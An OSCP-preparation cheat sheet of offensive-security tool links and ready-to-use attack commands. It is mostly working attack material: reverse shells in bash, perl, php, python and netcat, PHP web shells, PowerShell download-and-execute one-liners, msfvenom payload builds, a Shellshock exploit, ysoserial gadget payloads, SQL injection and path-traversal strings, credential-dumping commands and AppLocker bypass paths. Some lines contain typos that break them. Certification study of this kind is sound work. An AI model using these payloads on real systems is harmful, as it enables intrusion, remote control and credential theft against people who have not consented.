Commands, Payloads and Resources for the Offensive Security Certified Professional Certification.
Tool | URL |
---|---|
Swaks | https://github.com/jetmore/swaks |
CyberChef | https://gchq.github.io/CyberChef/ |
Tool | URL |
---|---|
Nmap | https://github.com/nmap/nmap |
Amass | https://github.com/OWASP/Amass |
BloodHound | https://github.com/BloodHoundAD/BloodHound |
BloodHound Python | https://github.com/fox-it/BloodHound.py |
enum4linux | https://github.com/CiscoCXSecurity/enum4linux |
Tool | URL |
---|---|
Nuclei | https://github.com/projectdiscovery/nuclei |
Sparta | https://github.com/SECFORCE/sparta |
Tool | URL |
---|---|
PayloadsAllTheThings | https://github.com/swisskyrepo/PayloadsAllTheThings |
ysoserial | https://github.com/frohoff/ysoserial |
JSON Web Tokens | https://jwt.io/ |
httpx | https://github.com/projectdiscovery/httpx |
Hakrawler | https://github.com/hakluke/hakrawler |
Gobuster | https://github.com/OJ/gobuster |
ffuf | https://github.com/ffuf/ffuf |
Wfuzz | https://github.com/xmendez/wfuzz |
WPScan | https://github.com/wpscanteam/wpscan |
Tool | URL |
---|---|
sqlmap | https://github.com/sqlmapproject/sqlmap |
Tool | URL |
---|---|
Hydra | https://github.com/vanhauser-thc/thc-hydra |
Patator | https://github.com/lanjelot/patator |
Kerbrute | https://github.com/ropnop/kerbrute |
CrackMapExec | https://github.com/byt3bl33d3r/CrackMapExec |
SprayingToolkit | https://github.com/byt3bl33d3r/SprayingToolkit |
RsaCtfTool | https://github.com/Ganapati/RsaCtfTool |
Default Credentials Cheat Sheet | https://github.com/ihebski/DefaultCreds-cheat-sheet |
Tool | URL |
---|---|
dnSpy | https://github.com/dnSpy/dnSpy |
AvalonialLSpy | https://github.com/icsharpcode/AvaloniaILSpy |
ghidra | https://github.com/NationalSecurityAgency/ghidra |
pwndbg | https://github.com/pwndbg/pwndbg |
cutter | https://github.com/rizinorg/cutter |
Radare2 | https://github.com/radareorg/radare2 |
GEF | https://github.com/hugsy/gef |
peda | https://github.com/longld/peda |
JD-GUI | https://github.com/java-decompiler/jd-gui |
Tool | URL |
---|---|
Impacket | https://github.com/SecureAuthCorp/impacket |
lsassy | https://github.com/Hackndo/lsassy |
Evil-WinRM | https://github.com/Hackplayers/evil-winrm |
Metasploit | https://github.com/rapid7/metasploit-framework |
Tool | URL |
---|---|
PwnTools | https://github.com/Gallopsled/pwntools |
checksec | https://github.com/slimm609/checksec.sh |
mona | https://github.com/corelan/mona |
Ropper | https://github.com/sashs/Ropper |
Buffer Overflow | https://github.com/gh0x0st/Buffer_Overflow |
Tool | URL |
---|---|
SecLists | https://github.com/danielmiessler/SecLists |
CeWL | https://github.com/digininja/cewl |
CUPP | https://github.com/Mebus/cupp |
Name | URL |
---|---|
IppSec (YouTube) | https://www.youtube.com/channel/UCa6eh7gCkpPo5XXUDfygQQA |
IppSec.rocks | https://ippsec.rocks/?# |
0xdf | https://0xdf.gitlab.io/ |
HackTricks | https://book.hacktricks.xyz/ |
Hacking Articles | https://www.hackingarticles.in/ |
Rana Khalil | https://rana-khalil.gitbook.io/hack-the-box-oscp-preparation/ |
doas -u <user> /bin/sh
certutil -urlcache -split -f "http://<local_ip>/<file>" <file>
./chisel server -p 9002 -reverse -v
./chisel client <remote_ip>:9002 R:9003:127.0.0.1:8888
gcc (--static) -m32 -Wl,--hash-style=both exploit.c -o exploit
i686-w64-mingw32-gcc -o main32.exe main.c
x86_64-w64-mingw32-gcc -o main64.exe main.c
nc -lnvp <local_port> < <file>
nc <remote_ip> <remote_port> > <file>
sudo php -S 127.0.0.1:80
ping -c 1 <remote_ip>
ping -n 1 <remote_ip>
sudo python -m SimpleHTTPServer 80
sudo pyhton3 -m http.server 80
xfreerdp /v:<remote_ip> /u:<user> /p:<password> +clipboard
rdesktop <remote_ip>
ssh user@<remote_ip> -oKexAlgorithms=+diffie-hellman-group1-sha1
ssh -R 8080:<local_ip>:80 <remote_ip>
ssh -L 8000:127.0.0.1:8000 <user>@<remote_ip>
ssh -N -L 1234:127.0.0.1:1234 <user>@<remote_ip>
ssh -L 80:<local_ip>:80 <remote_ip>
ssh -L 127.0.0.1:80:<local_ip>:80 <remote_ip>
ssh -L 80:localhost:80 <remote_ip>
ctrl b + w # show windows
ctrl + " # split window horizontal
ctrl + % # split window vertical
ctrl + , # rename window
ctrl + { # flip window
ctrl + } # flip window
ctrl + spacebar # switch pane layout
Copy & Paste
1. ctrl b + [
2. space
3. alt w
4. ctrl b + ]
Search
ctrl b + [ # enter copy
ctrl + / # enter search while within copy mode for vi mode
n # search next
shift + n # reverse search
python -c 'import pty;pty.spawn("/bin/bash")'
python3 -c 'import pty;pty.spawn("/bin/bash")'
ctrl + z
stty raw -echo
fg
Enter
Enter
export XTERM=xterm
:w !sudo tee % # save file with elevated privileges without exiting
echo "<command>" | iconv -f UTF-8 -t UTF-16LE | base64 -w0
sudo nmap -A -T4 -p- -sS -sV -oN initial --script discovery <remote_ip> # discovery scan
sudo nmap -A -T4 -sC -sV --script vuln <remote_ip> # vulnerability scan
sudo nmap -sU <remote_ip> # udp scan
sudo nmap -sC -sV -p- --scan-delay 5s <remote_ip> # delayed scan
sudo nmap $TARGET -p 88 --script krb5-enum-users --script-args krb5-enum-users.realm='test' <remote_ip> # kerberos enumeration
ls -lh /usr/share/nmap/scripts/*ssh*
locate -r '\.nse$' | xargs grep categories | grep categories | grep 'default\|version\|safe' | grep smb
whois <domain>
host <remote_ip> <remote_ip>
host -l <domain> <remote_ip>
dig @<remote_ip> -x <domain>
dig {a|txt|ns|mx} <domain>
dig {a|txt|ns|mx} <domain> @ns1.<domain>
dig axfr @<remote_ip> <domain> # zone transfer - needs tcp DNS - port 53
ldapsearch -x -w <password>
ldapsearch -x -h <remote_ip> -s base namingcontexts
ldapsearch -x -b "dc=<target_domain>,dc=local" "*" -h <remote_ip> | awk '/dn: / {print $2}'
ldapsearch -x -D "cn=admin,dc=<target_domain>,dc=local" -s sub "cn=*" -h <remote_ip> | awk '/uid: /{print $2}' | nl
ldapsearch -D "cn=admin,dc=acme,dc=com" "(objectClass=*)" -w ldapadmin -h ldap.acme.com
ldapsearch -x -h <remote_ip> -D "<user>" -b "dc=<target_domain>,dc=local" "(ms-MCS-AdmPwd=*)" ms-MCS-AdmPwd
sslyze --heartbleed <remote_ip>
nbtscan <remote_ip>
enum4linux -a <remote_ip>
./finger-user-enum.pl -U /usr/share/seclists/Usernames/Names/names.txt -t <remote_ip>
./nuclei -target https://<target_url> -t nuclei-templates # basic syntax with path to templates
./nuclei -target https://<target_url> -t nuclei-templates -rate-limit 5 # rate limiting
./nuclei -target https://<target_url> -t nuclei-templates -header 'User-Agent: Pentesting -H 'X-OSCP-EXAM: oscp_exam' # set headers
curl -s -k "https://jldc.me/anubis/subdomains/example.com" | grep -Po "((http|https):\/\/)?(([\w.-]*)\.([\w]*)\.([A-z]))\w+" | sed '/^\./d'
ffuf -w /usr/share/wordlists/dirb/common.txt -u http://<target_url>/FUZZ -mc 200,204,301,302,307,401 -o results.txt
ffuf -c -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -u http://<target_url>/ -H "Host: FUZZ.<target url>" -fs 185
ffuf -c -w /usr/share/wordlists/seclists/Fuzzing/4-digits-0000-9999.txt -u http://<target_url>/backups/backup_2020070416FUZZ.zip
ffuf -w /usr/share/wordlists/seclists/Fuzzing/LFI/LFI-Jhaddix.txt -u http://<target_url>/admin../admin_staging/index.php?page=FUZZ -fs 15349
gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://<remote_ip>/
gobuster dir -w /usr/share/seclists/Discovery/Web-Content/big.txt -u http://<remote_ip> -x php
gobuster dir -w /usr/share/wordlists/dirb/big.txt -u http://<remote_ip> -x php,txt,html,js -e -s 200
gobuster dir -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -u https://<remote_ip>:<remote_port>/ -b 200 -k --wildcard
gobuster dns -d <target_domain> -t 50 -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-110000.txt
hakrawler -url <remote_ip> -depth 3
hakrawler -url <remote_ip> -depth 3 -plain
hakrawler -url <remote_ip> -depth 3 -plain | httpx -http-proxy http://127.0.0.1:8080
http://<target_domain>/<file>.php?file=
http://<target_domain>/<file>.php?file=../../../../../../../../etc/passwd
http://<target_domain>/<file>/php?file=../../../../../../../../../../etc/passwd
http://<target_domain>/<file>/php?file=../../../../../../../../../../etc/passwd%00
../
..\
..\/
%2e%2e%2f
%252e%252e%252f
%c0%ae%c0%ae%c0%af
%uff0e%uff0e%u2215
%uff0e%uff0e%u2216
..././
...\.\
http://<remote_ip>/index.php?page=php://filter/convert.base64-encode/resource=index
base64 -d <file>.php
/etc/passwd
/etc/shadow
/etc/aliases
/etc/anacrontab
/etc/apache2/apache2.conf
/etc/apache2/httpd.conf
/etc/apache2/sites-enabled/000-default.conf
/etc/at.allow
/etc/at.deny
/etc/bashrc
/etc/bootptab
/etc/chrootUsers
/etc/chttp.conf
/etc/cron.allow
/etc/cron.deny
/etc/crontab
/etc/cups/cupsd.conf
/etc/exports
/etc/fstab
/etc/ftpaccess
/etc/ftpchroot
/etc/ftphosts
/etc/groups
/etc/grub.conf
/etc/hosts
/etc/hosts.allow
/etc/hosts.deny
/etc/httpd/access.conf
/etc/httpd/conf/httpd.conf
/etc/httpd/httpd.conf
/etc/httpd/logs/access_log
/etc/httpd/logs/access.log
/etc/httpd/logs/error_log
/etc/httpd/logs/error.log
/etc/httpd/php.ini
/etc/httpd/srm.conf
/etc/inetd.conf
/etc/inittab
/etc/issue
/etc/lighttpd.conf
/etc/lilo.conf
/etc/logrotate.d/ftp
/etc/logrotate.d/proftpd
/etc/logrotate.d/vsftpd.log
/etc/lsb-release
/etc/motd
/etc/modules.conf
/etc/motd
/etc/mtab
/etc/my.cnf
/etc/my.conf
/etc/mysql/my.cnf
/etc/network/interfaces
/etc/networks
/etc/npasswd
/etc/passwd
/etc/php4.4/fcgi/php.ini
/etc/php4/apache2/php.ini
/etc/php4/apache/php.ini
/etc/php4/cgi/php.ini
/etc/php4/apache2/php.ini
/etc/php5/apache2/php.ini
/etc/php5/apache/php.ini
/etc/php/apache2/php.ini
/etc/php/apache/php.ini
/etc/php/cgi/php.ini
/etc/php.ini
/etc/php/php4/php.ini
/etc/php/php.ini
/etc/printcap
/etc/profile
/etc/proftp.conf
/etc/proftpd/proftpd.conf
/etc/pure-ftpd.conf
/etc/pureftpd.passwd
/etc/pureftpd.pdb
/etc/pure-ftpd/pure-ftpd.conf
/etc/pure-ftpd/pure-ftpd.pdb
/etc/pure-ftpd/putreftpd.pdb
/etc/redhat-release
/etc/resolv.conf
/etc/samba/smb.conf
/etc/snmpd.conf
/etc/ssh/ssh_config
/etc/ssh/sshd_config
/etc/ssh/ssh_host_dsa_key
/etc/ssh/ssh_host_dsa_key.pub
/etc/ssh/ssh_host_key
/etc/ssh/ssh_host_key.pub
/etc/sysconfig/network
/etc/syslog.conf
/etc/termcap
/etc/vhcs2/proftpd/proftpd.conf
/etc/vsftpd.chroot_list
/etc/vsftpd.conf
/etc/vsftpd/vsftpd.conf
/etc/wu-ftpd/ftpaccess
/etc/wu-ftpd/ftphosts
/etc/wu-ftpd/ftpusers
/logs/pure-ftpd.log
/logs/security_debug_log
/logs/security_log
/opt/lampp/etc/httpd.conf
/opt/xampp/etc/php.ini
/proc/cpuinfo
/proc/filesystems
/proc/interrupts
/proc/ioports
/proc/meminfo
/proc/modules
/proc/mounts
/proc/stat
/proc/swaps
/proc/version
/proc/self/net/arp
/proc/sched_debug
/proc/net/arp
/proc/net/tcp
/proc/net/udp
/root/anaconda-ks.cfg
/usr/etc/pure-ftpd.conf
/usr/lib/php.ini
/usr/lib/php/php.ini
/usr/local/apache/conf/modsec.conf
/usr/local/apache/conf/php.ini
/usr/local/apache/log
/usr/local/apache/logs
/usr/local/apache/logs/access_log
/usr/local/apache/logs/access.log
/usr/local/apache/audit_log
/usr/local/apache/error_log
/usr/local/apache/error.log
/usr/local/cpanel/logs
/usr/local/cpanel/logs/access_log
/usr/local/cpanel/logs/error_log
/usr/local/cpanel/logs/license_log
/usr/local/cpanel/logs/login_log
/usr/local/cpanel/logs/stats_log
/usr/local/etc/httpd/logs/access_log
/usr/local/etc/httpd/logs/error_log
/usr/local/etc/php.ini
/usr/local/etc/pure-ftpd.conf
/usr/local/etc/pureftpd.pdb
/usr/local/lib/php.ini
/usr/local/php4/httpd.conf
/usr/local/php4/httpd.conf.php
/usr/local/php4/lib/php.ini
/usr/local/php5/httpd.conf
/usr/local/php5/httpd.conf.php
/usr/local/php5/lib/php.ini
/usr/local/php/httpd.conf
/usr/local/php/httpd.conf.ini
/usr/local/php/lib/php.ini
/usr/local/pureftpd/etc/pure-ftpd.conf
/usr/local/pureftpd/etc/pureftpd.pdn
/usr/local/pureftpd/sbin/pure-config.pl
/usr/local/www/logs/httpd_log
/usr/local/Zend/etc/php.ini
/usr/sbin/pure-config.pl
/var/adm/log/xferlog
/var/apache2/config.inc
/var/apache/logs/access_log
/var/apache/logs/error_log
/var/cpanel/cpanel.config
/var/lib/mysql/my.cnf
/var/lib/mysql/mysql/user.MYD
/var/local/www/conf/php.ini
/var/log/apache2/access_log
/var/log/apache2/access.log
/var/log/apache2/error_log
/var/log/apache2/error.log
/var/log/apache/access_log
/var/log/apache/access.log
/var/log/apache/error_log
/var/log/apache/error.log
/var/log/apache-ssl/access.log
/var/log/apache-ssl/error.log
/var/log/auth.log
/var/log/boot
/var/htmp
/var/log/chttp.log
/var/log/cups/error.log
/var/log/daemon.log
/var/log/debug
/var/log/dmesg
/var/log/dpkg.log
/var/log/exim_mainlog
/var/log/exim/mainlog
/var/log/exim_paniclog
/var/log/exim.paniclog
/var/log/exim_rejectlog
/var/log/exim/rejectlog
/var/log/faillog
/var/log/ftplog
/var/log/ftp-proxy
/var/log/ftp-proxy/ftp-proxy.log
/var/log/httpd-access.log
/var/log/httpd/access_log
/var/log/httpd/access.log
/var/log/httpd/error_log
/var/log/httpd/error.log
/var/log/httpsd/ssl.access_log
/var/log/httpsd/ssl_log
/var/log/kern.log
/var/log/lastlog
/var/log/lighttpd/access.log
/var/log/lighttpd/error.log
/var/log/lighttpd/lighttpd.access.log
/var/log/lighttpd/lighttpd.error.log
/var/log/mail.info
/var/log/mail.log
/var/log/maillog
/var/log/mail.warn
/var/log/message
/var/log/messages
/var/log/mysqlderror.log
/var/log/mysql.log
/var/log/mysql/mysql-bin.log
/var/log/mysql/mysql.log
/var/log/mysql/mysql-slow.log
/var/log/proftpd
/var/log/pureftpd.log
/var/log/pure-ftpd/pure-ftpd.log
/var/log/secure
/var/log/vsftpd.log
/var/log/wtmp
/var/log/xferlog
/var/log/yum.log
/var/mysql.log
/var/run/utmp
/var/spool/cron/crontabs/root
/var/webmin/miniserv.log
/var/www/<vhost>/__init__.py
/var/www/log/access_log
/var/www/log/error_log
/var/www/logs/access_log
/var/www/logs/error_log
/var/www/logs/access.log
/var/www/logs/error.log
~/.atfp_history
~/.bash_history
~/.bash_logout
~/.bash_profile
~/.bashrc
~/.gtkrc
~/.login
~/.logout
~/.mysql_history
~/.nano_history
~/.php_history
~/.profile
~/.ssh/authorized_keys
~/.ssh/id_dsa
~/.ssh/id_dsa.pub
~/.ssh/id_rsa
~/.ssh/id_rsa.pub
~/.ssh/identity
~/.ssh/identity.pub
~/.viminfo
~/.wm_style
~/.Xdefaults
~/.xinitrc
~/.Xresources
~/.xsession
C:/Users/Administrator/NTUser.dat
C:/Documents and Settings/Administrator/NTUser.dat
C:/apache/logs/access.log
C:/apache/logs/error.log
C:/apache/php/php.ini
C:/boot.ini
C:/inetpub/wwwroot/global.asa
C:/MySQL/data/hostname.err
C:/MySQL/data/mysql.err
C:/MySQL/data/mysql.log
C:/MySQL/my.cnf
C:/MySQL/my.ini
C:/php4/php.ini
C:/php5/php.ini
C:/php/php.ini
C:/Program Files/Apache Group/Apache2/conf/httpd.conf
C:/Program Files/Apache Group/Apache/conf/httpd.conf
C:/Program Files/Apache Group/Apache/logs/access.log
C:/Program Files/Apache Group/Apache/logs/error.log
C:/Program Files/FileZilla Server/FileZilla Server.xml
C:/Program Files/MySQL/data/hostname.err
C:/Program Files/MySQL/data/mysql-bin.log
C:/Program Files/MySQL/data/mysql.err
C:/Program Files/MySQL/data/mysql.log
C:/Program Files/MySQL/my.ini
C:/Program Files/MySQL/my.cnf
C:/Program Files/MySQL/MySQL Server 5.0/data/hostname.err
C:/Program Files/MySQL/MySQL Server 5.0/data/mysql-bin.log
C:/Program Files/MySQL/MySQL Server 5.0/data/mysql.err
C:/Program Files/MySQL/MySQL Server 5.0/data/mysql.log
C:/Program Files/MySQL/MySQL Server 5.0/my.cnf
C:/Program Files/MySQL/MySQL Server 5.0/my.ini
C:/Program Files (x86)/Apache Group/Apache2/conf/httpd.conf
C:/Program Files (x86)/Apache Group/Apache/conf/httpd.conf
C:/Program Files (x86)/Apache Group/Apache/conf/access.log
C:/Program Files (x86)/Apache Group/Apache/conf/error.log
C:/Program Files (x86)/FileZilla Server/FileZilla Server.xml
C:/Program Files (x86)/xampp/apache/conf/httpd.conf
C:/WINDOWS/php.ini
C:/WINDOWS/Repair/SAM
C:/Windows/repair/system
C:/Windows/repair/software
C:/Windows/repair/security
C:/WINDOWS/System32/drivers/etc/hosts
C:/Windows/win.ini
C:/WINNT/php.ini
C:/WINNT/win.ini
C:/xampp/apache/bin/php.ini
C:/xampp/apache/logs/access.log
C:/xampp/apache/logs/error.log
C:/Windows/Panther/Unattend/Unattended.xml
C:/Windows/Panther/Unattended.xml
C:/Windows/debug/NetSetup.log
C:/Windows/system32/config/AppEvent.Evt
C:/Windows/system32/config/SecEvent.Evt
C:/Windows/system32/config/default.sav
C:/Windows/system32/config/security.sav
C:/Windows/system32/config/software.sav
C:/Windows/system32/config/system.sav
C:/Windows/system32/config/regback/default
C:/Windows/system32/config/regback/sam
C:/Windows/system32/config/regback/security
C:/Windows/system32/config/regback/system
C:/Windows/system32/config/regback/software
C:/Program Files/MySQL/MySQL Server 5.1/my.ini
C:/Windows/System32/inetsrv/config/schema/ASPNET_schema.xml
C:/Windows/System32/inetsrv/config/applicationHost.config
C:/inetpub/logs/LogFiles/W3SVC1/u_ex[YYMMDD].log
wfuzz -w /usr/share/wfuzz/wordlist/general/big.txt -u http://<remote_ip>:<remote_port>/FUZZ/<file>.php --hc '403,404'
wfuzz -w /usr/share/wordlists/seclists/Discovery/Web-Content/big.txt -u http://<remote_ip:/<directory>/FUZZ.FUZ2Z -z list,txt-php --hc 403,404 -c
wfuzz -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-110000.txt -H "Host: FUZZ.<target_url>" --hc 200 --hw 356 -t 100 <remote_ip>
wfuzz -X POST -u "http://<remote_ip>:<remote_port>/login.php" -d "email=FUZZ&password=<password>" -w /path/to/wordlist.txt --hc 200 -c
wfuzz -c -z file,/usr/share/wordlists/seclists/Fuzzing/SQLi/Generic-SQLi.txt -d 'db=FUZZ' --hl 16 http://<remote_ip>/select
wfuzz -c -w /usr/share/wordlists/secLists/Discovery/DNS/subdomains-top1million-110000.txt --hc 400,403,404 -H "Host: FUZZ.<target_domain>" -u http://<target_domain> --hw <value> -t 100
wfuzz -w /usr/share/wordlists/seclists/Fuzzing/4-digits-0000-9999.txt --hw 31 http://10.13.37.11/backups/backup_2021052315FUZZ.zip
wpscan --url https://<remote_ip> --disable-tls-checks
wpscan --url https://<remote_ip> --disable-tls-checks --enumerate u
target=<remote_ip>; wpscan --url http://$target:80 --enumerate u,t,p | tee $target-wpscan-enum
wpscan --url http://<remote_ip> -U <user> -P passwords.txt -t 50
java -jar ysoserial-master-SNAPSHOT.jar
java -jar ysoserial-master-SNAPSHOT.jar CommonsCollections1 'nc <local_ip> <local_port> -e /bin/sh' | base64 -w 0
java -jar ysoserial.jar Groovy1 calc.exe > groovypayload.bin
java -jar ysoserial-master-6eca5bc740-1.jar CommonsCollections4 "$jex" > /tmp/$filename.session
show databases;
use <db>;
show tables;
SELECT * FROM *;
mysql -u <user> -h <host> -p
' or '1'='1
admin' or '1'='1
-'
' '
'&'
'^'
'*'
' or ''-'
' or '' '
' or ''&'
' or ''^'
' or ''*'
"-"
" "
"&"
"^"
"*"
" or ""-"
" or "" "
" or ""&"
" or ""^"
" or ""*"
or true--
" or true--
' or true--
") or true--
') or true--
' or 'x'='x
') or ('x')=('x
')) or (('x'))=(('x
" or "x"="x
") or ("x")=("x
")) or (("x"))=(("x
--batch # don't ask any questions
--current-db # dumps database
sqlmap --list-tampers
sqlmap -r <file>.reg -p id
sqlmap -r <file>.reg -p id --dump
sqlmap -r <file>.reg --level 5 --risk 3 --threads 10
sqlmap -r <file>.reg --level 5 --risk 3 --tables
sqlmap -r <file>.reg --level 5 --risk 3 --tables users --dump --threads 10
sqlmap -r <file>.reg -p id --passwords
sqlmap -r <file>.reg -p id --read-file+/etc/passwd
sqlmap -R <file>.reg -p id --os-cmd=whoami
sqlmap -u 'http://<remote_ip>/dashboard.php?search=a' --cookie="PHPSESSID=c35v0sipg7q8cnpiqpeqj42hhq"
sqlmap -u 'http://<remote_ip>/dashboard.php?search=a' --cookie="PHPSESSID=c35v0sipg7q8cnpiqpeqj42hhq" --os-shell
sqsh -S <remote_ip> -U <user>
'admin@<FQDN>' = 'admin@<FQDN>++++++++++++++++++++++++++++++++++++++htb'
test' or 1=1 or 'a'='a
test' or 1=2 or 'a'='a
'or substring(Password,1,1)='p' or' # checking letter "p" on the beginning of the password
'or substring(Password,2,1)='p' or' # checking letter "p" on the second position of the password
fcrackzip -u -D -p /usr/share/wordlists/rockyou.txt <file>.zip
export HYDRA_PROXY=connect://127.0.0.1:8080
unset HYDRA_PROXY
hydra <remote_ip> http-form-post "/otrs/index.pl:Action=Login&RequestedURL=Action=Admin&User=root@localhost&Password=^PASS^:Login failed" -l root@localhost -P otrs-cewl.txt -vV -f
hydra -l admin -P /usr/share/wordlists/rockyou.txt <remote_ip> http-post-form "/Account/login.aspx?ReturnURL=/admin/:__VIEWSTATE=COOKIE_1&__EVENTVALIDATION=COOKIE_2&UserName=^USER^&Password=^PASS^&LoginButton=Log+in:Login failed"
/usr/share/john/ssh2john.py id_rsa > hash
john hash --wordlist=/usr/share/wordlists/rockyou.txt <file>
john --rules --wordlist=/usr/share/wordlists/rockyou.txt <file>
john --show <file>
psexec.py <user>@<remote_ip>
sudo impacket-smbserver local . -smb2support
rpcdump.py <target_domain>/<user>:<password/hash>@<remote_ip>
smbclient.py <target_domain>/<user>:<password/hash>@<remote_ip>
lookupsid.py <target_domain>/<user>:<password/hash>@<remote_ip>
reg.py <target_domain>/<user>:[password:password hash]@<remote_ip> <action> <action>
mssqlclient.py <user>@<remote_ip>
mssqlclient.py <user>@<remote_ip> -windows-auth
getST.py intelligence.htb/svc_int$ -spn WWW/dc.intelligence.htb -hashes :d64b83fe606e6d3005e20ce0ee932fe2 -impersonate Administrator
GetNPUsers.py <target_domain>.local/ -usersfile usernames.txt -format hashcat -outputfile hashes.asreproast
getTGT.py <domain>.local/<user> -dc-ip <domain>.local -hashes aad3b435b51404eeaad3b435b51404ee:7c662956a4a0486a80fbb2403c5a9c2c
secretsdump.py <domain>/<user>@<remote_ip>
secretsdump.py -ntds ndts.dit -system system -hashes lmhash:nthash LOCAL -output nt-hash
/usr/share/webshells
<?php echo shell_exe(($_GET['cmd']); ?>
<?php echo "test";?>
<?php system($_GET['cmd']);?>
<?php file_put_contents($_GET['upload'], file_get_contents("http://<local_ip>:<local_port>/" . $_GET['upload']); ?>
<?php if (isset($_GET['upload'])) {file_put_contents($_GET['upload'], file_get_contents("http://<local_ip>:<local_port>/" . $_GET['upload'])); }; if (isset($_GET['cmd'])) { system($_GET['cmd']); };?>
Bypass List (Windows 10 Build 1803):
C:\Windows\Tasks
C:\Windows\Temp
C:\windows\tracing
C:\Windows\Registration\CRMLog
C:\Windows\System32\FxsTmp
C:\Windows\System32\com\dmp
C:\Windows\System32\Microsoft\Crypto\RSA\MachineKeys
C:\Windows\System32\spool\PRINTERS
C:\Windows\System32\spool\SERVERS
C:\Windows\System32\spool\drivers\color
C:\Windows\System32\Tasks\Microsoft\Windows\SyncCenter
C:\Windows\System32\Tasks_Migrated (after peforming a version upgrade of Windows 10)
C:\Windows\SysWOW64\FxsTmp
C:\Windows\SysWOW64\com\dmp
C:\Windows\SysWOW64\Tasks\Microsoft\Windows\SyncCenter
C:\Windows\SysWOW64\Tasks\Microsoft\Windows\PLA\System
powershell -c "$SecPass = Convertto-securestring 'Welcome1!' -AsPlainText -Force;$cred=New-Object System.Management.Automation.PScredential('administrator', $SecPass);Start-Process -FilePath 'C:\Users\Public\Downloads\nc.exe' -argumentlist '-e cmd <local_ip> <local_port>' -Credential $cred"
sudo -u#-1 /bin/bash
id
sudo -l
uname -a
cat /etc/hosts
cat /etc/fstab
cat /etc/passwd
ss -tulpn
ps -auxf
ls -lahv
ls -R /home
systeminfo
whoami /all
net users
net users <user>
sudo ruby /usr/local/bin/evil-winrm -i <remote_ip> -u <user> -p <password>
find ./ -type f -exec grep --color=always -i -I 'password' {} \;
find / -group <group> 2>/dev/null
find / -user <user> 2>/dev/null
find / -user <user> -ls 2>/dev/null
find / -user <user> 2>/dev/null | grep -v proc 2>/dev/null
find / -user <user> -ls 2>/dev/null | grep -v proc 2>/dev/null
find / -perm -4000 2>/dev/null
find / -perm -4000 2>/dev/null | xargs ls -la
find / -type f -user root -perm -4000 2>/dev/null
grep -R db_passwd
grep -roiE "password.{20}"
grep -oiE "password.{20}" /etc/*.conf
IEX(New-Object Net.webclient).downloadString('http://<local_ip>:<local_port>/jaws-enum.ps1')
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<local_ip> LPORT=<local_port> -b "\x00\x0a" -a x86 --platform windows -f exe -o exploit.exe
msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST <local_ip>
msf6 exploit(multi/handler) > set LPORT <local_ip>
msf6 exploit(multi/handler) > run
.\exploit.exe
laZagne.exe all
cd path/to/nishang/Shells/
cp Invoke-PowerShellTcp.ps1 Invoke-PowerShellTcp.ps1
tail -3 Invoke-PowerShellTcp.ps1
}
Invoke-PowerShellTcp -Reverse -IPAddress <local_ip> -Port <local_port>
powershell "IEX(New-Object Net.Webclient).downloadString('http://<local_ip>:<local_port>/Invoke-PowerShellTcp.ps1')"
Set-ExecutionPolicy Unrestricted
powershell -Command "$PSVersionTable.PSVersion" # check powershell version
powershell -c "[Environment]::Is64BitProcess" # check for 64bit powershell
cmd /c powershell -nop -exec bypass -c "iex(new-object net.webclient).downloadstring('http://<local_ip>:<local_port>/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress <local_ip> -Port <local_port>"
powershell -c "(new-object System.Net.WebClient).DownloadFile(\"http://<local_ip>:<local_port>/nc.exe\",\"C:\Users\Public\Downloads\nc.exe\")"
powershell (New-Object System.Net.WebClient).UploadFile('http://<local_ip>/upload.php', '<file>')
powershell -c "Invoke-Webrequest -Uri \"http://<local_ip>:<local_port>/shell.exe\" -OutFile \"C:\Users\Public\Downloads\shell.exe\""
<remote_ip>/node/3?cmd=powershell -c IEX(New-object System.net.webclient).DownloadString('http://<local_ip>:<local:port>/Sherlock.ps1');Find-AllVulns
echo "IEX (New-object System.net.webclient).DownloadString('http://<local_ip>:<local_port>/shell.ps1')" | powershell -noprofile -
curl -H 'Cookie: () { :;}; /bin/bash -i >& /dev/tcp/<local_ip>/<local_port> 0>&1' http://<remote_ip>/cgi-bin/user.sh
msfvenom -p windows/shell_reverse_tcp LHOST=<local_ip> LPORT=<local_port> -f c -a x86 --platform windows -b "\x00\x0a\x0d" -e x86/shikata_ga_nai
msfvenom -a x86 --platform windows -p windows/shell/reverse_tcp LHOST=<local_ip> LPORT=<local_port> -b "\x00" -e x86/shikata_ga_nai -f exe -o /tmp/shell.exe
tasklist /SVC
netsh firewall show state
schtasks /query /fo LIST /v
driverquery.exe /v /fo csv | ConvertFrom-CSV | Select-Object 'Display Name', 'Start Mode', Path
sc query
sc qc <service-name>
accesschk.exe -uws "Everyone" "C:\Program Files"
dir /s *pass* == *cred* == *vnc* == *.config*
findstr /si password *.xml *.ini *.txt
wmic qfe get Caption,Description,HotFixID,InstalledOn # no new patches - KEXP pretty likely
/dev/shm
/tmp
bash -i >& /dev/tcp/<local_ip>/<local_port> 0>&1
bash -c 'bash -i >& /dev/tcp/<local_ip>/<local_port> 0>&1'
http://<target_url>');os.execute("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <local_ip> <local_port>/tmp/f")-- # lua
nc -e /bin/sh <local_ip> <local_port>
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <local_ip> <local_port> >/tmp/f
perl -e 'use Socket;$i="<local_ip>";$p=<local_port>;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
php -r '$sock=fsockopen("<local_ip>",<local_port>);exec("/bin/sh -i <&3 >&3 2>&3");'
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<local_ip>",<local_port>));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
